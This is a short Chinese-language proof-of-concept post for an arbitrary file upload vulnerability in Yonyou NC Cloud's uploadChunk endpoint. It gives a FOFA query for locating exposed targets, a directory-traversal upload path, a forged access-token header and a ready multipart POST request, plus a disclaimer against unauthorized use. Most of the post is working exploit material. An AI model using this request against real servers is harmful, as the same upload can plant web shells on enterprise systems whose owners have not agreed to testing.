简介
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件上传漏洞。
漏洞复现
FOFA语法:
app="用友-NC-Cloud"
访问页面如下所示:
POC:/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1
POST请求数据包:
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Content-Length: 149
Content-Type: multipart/form-data; boundary=bd966ad8118cfcc67ee341272f2900c4--bd966ad8118cfcc67ee341272f2900c4
Content-Disposition: form-data; name="file"; filename="text.txt"test123
--bd966ad8118cfcc67ee341272f2900c4--
请求返回成功后访问:
https://ip:port/nccloud/text.txt
免责声明
文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!
结语
没有人规定,一朵花一点要成长为向日葵或者玫瑰。